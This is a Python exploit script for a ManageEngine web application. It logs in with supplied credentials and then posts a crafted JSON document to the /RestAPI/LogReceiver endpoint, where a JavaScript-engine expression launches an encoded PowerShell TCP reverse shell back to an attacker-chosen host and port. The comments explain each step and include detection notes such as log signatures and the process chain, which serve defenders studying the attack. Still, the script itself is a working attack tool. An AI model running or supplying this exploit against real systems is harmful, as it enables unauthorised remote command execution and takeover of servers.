#!/usr/bin/env python3
import requests
import urllib3
import base64
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Disable SSL warnings
# Both calls silence urllib3's InsecureRequestWarning; the second goes through
# the requests.packages compatibility alias, which points at the same urllib3
# module in current requests releases.  Only the warning is suppressed here --
# certificate validation itself is skipped by the verify=False arguments on
# the requests issued in exploit() below.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def exploit(target_url: str, username: str, password: str, lhost: str, lport: str) -> bool | None:
    """Log in to the target, then post the crafted LogReceiver request.

    Flow as written: authenticate through ``/j_security_check`` with the
    supplied form credentials, then POST a JSON document to
    ``/RestAPI/LogReceiver`` whose ``metaData.systemProperty`` value is a
    script expression that starts ``cmd.exe /c powershell -enc <payload>``.
    The payload is a base64-wrapped, UTF-16LE-encoded PowerShell TCP client
    that connects back to ``lhost:lport``.

    Args:
        target_url: Base URL including scheme and port (the usage text shows
            the ``https://host:8443`` form).  Paths are appended with a
            single ``/``, so a trailing slash would produce ``//``.
        username: Value sent as ``j_username``.
        password: Value sent as ``j_password``.
        lhost: Listener address embedded in the PowerShell one-liner.
        lport: Listener port embedded in the PowerShell one-liner (kept as a
            string; it is only interpolated into text).

    Returns:
        ``False`` when the login body contains ``loginError`` or the login
        request raises; otherwise ``None`` -- the second request's outcome is
        only printed, never returned to the caller.

    Detection notes (grounded in the requests this function sends):
        - A POST to ``/RestAPI/LogReceiver`` whose JSON contains
          ``getClass().forName("javax.script.ScriptEngineManager")`` or
          ``java.lang.ProcessBuilder`` under ``metaData.systemProperty`` has
          no benign shape and is a precise log/WAF signature.
        - On the host the visible chain is ``cmd.exe /c powershell -enc``,
          presumably spawned by the product's Java process under its service
          account (confirm against the deployment), followed by an outbound
          TCP connection to ``lhost:lport``.
        - The activity is preceded by a successful form login, so it is
          attributable to a valid account; correlate the login event with the
          LogReceiver request when triaging.
    """
    session = requests.Session()
    # 1. Authenticate to ManageEngine
    # Form login; the session object keeps whatever cookie the server sets so
    # the second request is sent as the authenticated user.
    login_url = f"{target_url}/j_security_check"
    data = {
        'j_username': username,
        'j_password': password,
        'submit': 'Login'
    }
    try:
        # verify=False skips certificate validation for this request; the
        # module-level disable_warnings() calls only hide the resulting warning.
        login_response = session.post(
            login_url,
            data=data,
            verify=False,
            timeout=10
        )
        # Only the 'loginError' marker is inspected: any other response body,
        # including an unrelated error page, is treated as a successful login.
        if 'loginError' in login_response.text:
            print("[-] Authentication failed")
            return False
    except Exception as e:
        # Broad catch: timeouts, DNS/TLS failures and requests exceptions all
        # end here and are reported the same way.
        print(f"[-] Connection error: {str(e)}")
        return False
    # 2. Prepare reverse shell payload
    # Single-line PowerShell TCP client: opens a socket to lhost:lport, reads
    # each chunk from the socket, runs it with iex, and writes the output plus
    # a "PS <cwd>> " prompt back over the same socket until the stream closes.
    powershell_cmd = f"$client = New-Object System.Net.Sockets.TCPClient('{lhost}',{lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()"
    # UTF-16LE then base64 is the encoding PowerShell's -enc switch expects.
    encoded_cmd = base64.b64encode(powershell_cmd.encode('utf-16le')).decode()
    # 3. Exploit the deserialization vulnerability
    # The only attacker-controlled field that matters is the systemProperty
    # value: a JavaScript-engine expression that builds a ProcessBuilder for
    # cmd.exe -> powershell -enc <encoded_cmd>.  The other fields are filler.
    exploit_url = f"{target_url}/RestAPI/LogReceiver"
    headers = {
        'Content-Type': 'application/json'
    }
    payload = {
        "logType":"name",
        "logData":"raw",
        "hostName":"localhost",
        "appName":"app",
        "logSource":"local",
        "metaData": {
            "systemProperty": {
                "com.adventnet.servicemanager.install.dir": f"\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd.exe','/c','powershell -enc {encoded_cmd}']).start()\")"
            }
        }
    }
    try:
        print("[+] Sending exploit payload...")
        response = session.post(
            exploit_url,
            json=payload,
            headers=headers,
            verify=False,
            timeout=15
        )
        # HTTP 200 only shows the endpoint accepted the document; whether the
        # embedded command ran is not observable from this response.
        if response.status_code == 200:
            print("[+] Exploit triggered successfully!")
            print("[+] Check your netcat listener for shell")
        else:
            print(f"[-] Exploit failed (Status code: {response.status_code})")
    except Exception as e:
        # Same broad catch as the login step; no return value in either branch.
        print(f"[-] Exploit failed: {str(e)}")
if __name__ == "__main__":
    # Exactly five positional arguments are required after the script name.
    if len(sys.argv) != 6:
        print(f"Usage: {sys.argv[0]} <target_url> <username> <password> <lhost> <lport>")
        print(f"Example: {sys.argv[0]} https://localhost:8443 admin admin 192.168.45.217 9001")
        sys.exit(1)
    # Positional order follows the usage line; every value stays a string.
    target_url, username, password, lhost, lport = sys.argv[1:6]
    exploit(target_url, username, password, lhost, lport)